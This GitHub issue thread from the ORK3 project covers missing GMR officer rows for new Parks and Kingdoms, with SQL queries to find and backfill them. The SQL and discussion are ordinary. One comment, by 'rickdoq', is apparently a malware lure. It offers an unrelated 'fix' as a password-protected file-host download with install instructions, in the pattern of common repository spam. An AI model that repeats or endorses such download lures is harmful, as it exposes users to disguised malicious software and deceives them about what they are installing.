### ISSUE TITLE
New Parks/Kingdoms do not have a GMR Office field to fill in

### ISSUE THREAD

**Issue by kenwalker** [amtgard/ORK3#343]
When new Parks or Kingdoms are created the GMR slot in the Officers database is not created and so that field cannot be set because it is not shown in the UI. 

The fix will require both an SQL statement to be run to fix up the parks missing the row with GMR role and the code change to ensure the DB has the row added.

**Comment by kenwalker** [comment]
To see if any parks do not have a GMR record:

```
SELECT distinct park_id
FROM ork.ork_officer
WHERE park_id NOT IN (
   SELECT park_id
   FROM ork.ork_officer
   WHERE role = "GMR"
) 
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by kenwalker** [comment]
I think this is the right SQL update to fix the exiting non-GMR capable parks.  No Kingdoms have this yet since none have been created since it was introduced, but they would have had this issue if done so.
```

INSERT INTO ork_officer (kingdom_id, park_id, mundane_id, role, authorization_id)
SELECT kingdom_id, t2.park_id, 0, "GMR", 0 FROM
(SELECT distinct park_id
FROM ork.ork_officer
WHERE park_id NOT IN (
   SELECT park_id
   FROM ork.ork_officer
   WHERE role = "GMR"
)) t1 
INNER JOIN
(SELECT park_id, kingdom_id FROM ork.ork_park) t2
ON t1.park_id = t2.park_id ORder by kingdom_id

```

**Comment by kenwalker** [comment]
Will close once the SQL has been run and master branch with this merged fix has been deployed

**Comment by kenwalker** [comment]
Fix released and SQL code has been run
